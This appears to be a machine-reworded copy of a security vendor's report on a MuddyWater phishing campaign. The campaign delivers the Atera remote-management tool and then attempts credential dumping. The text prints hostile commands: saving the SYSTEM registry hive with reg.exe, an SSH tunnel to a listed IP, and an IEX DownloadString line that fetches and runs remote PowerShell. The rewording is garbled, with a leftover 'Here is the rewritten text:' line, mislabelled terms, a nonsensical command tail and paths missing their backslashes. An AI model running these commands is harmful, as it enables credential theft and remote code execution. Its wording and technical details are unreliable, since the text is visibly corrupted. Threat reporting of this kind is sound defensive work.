Sophos’ Managed Detection and Response (MDR) team has identified a novel marketing campaign leveraging targeted phishing tactics to trick victims into obtaining a legitimate remote access tool, ultimately aiming to exfiltrate sensitive login credentials. With high confidence, we attribute the STAC 1171 exercise to the Iranian threat actor MuddyWater (TA450).
In early November, Sophos’ advanced endpoint detection capabilities successfully thwarted a sophisticated attempt to dump credentials at an Israeli corporation, highlighting the effectiveness of its behavioral-based threat detection mechanisms. Upon reviewing the exercise, we noted instances where indicators of TA450 overlapped with Tactics, Techniques, and Procedures (TTP), necessitating further analysis to clarify any ambiguities. The actor initially gained access through a phishing email, which prompted the victim to open a shared document hosted on OneHub, specifically at https://ws.onehub.com/information/, and download a file called “New Program ICC LTD.zip”.
Here is the rewritten text:
The ‘New Program ICC LTD.zip’ archive contains a compressed installer file for Atera, a remote monitoring and management (RMM) device designed for authentic distant monitoring and administration. The Atera setup utilized a trial account registered to an email address we believe was compromised. When deploying Atera Agent, the malicious actors leveraged remote execution instructions from Atera to execute a PowerShell script (a.ps1), whose intended purposes included exfiltrating credentials and creating a backup copy of the SYSTEM registry hive. Sophos successfully intercepted and thwarted a credential dumping operation in compliance with its robust behavioral detection protocols.
“cmdline”: “C:WINDOWSsystem32reg.exe” save HKLMSYSTEM SystemBkup.hiv”
Subsequent compromise actions in Atera were also incorporated.
- The enumeration process for a specific geographic region consists of several key steps.
- A secure SSH tunnel is established to a remote server located at IP address 51.16.209.105.
- IEX ((New-Object System.Net.WebClient).DownloadString(“https://raw.githubusercontent.com/PowerShell-Mafia/Obfuscation/master/OBFUSCATE.ps1”)) | iex; $DegreeRMM = New-Object -ComObject “InstallWindows.exe”
One US-based Sophos non-MDR buyer has exhibited identical telemetry behavior to ours. Sophos X-Ops will continue monitoring the threat cluster’s development and update its information accordingly.
Acknowledgements
Sophos X-Ops would like to express its gratitude to Joshua Rawles, Hristina Ivanova, and Mark Parsons for their collaborative efforts in addressing this threat and their significant contributions to this investigation’s findings.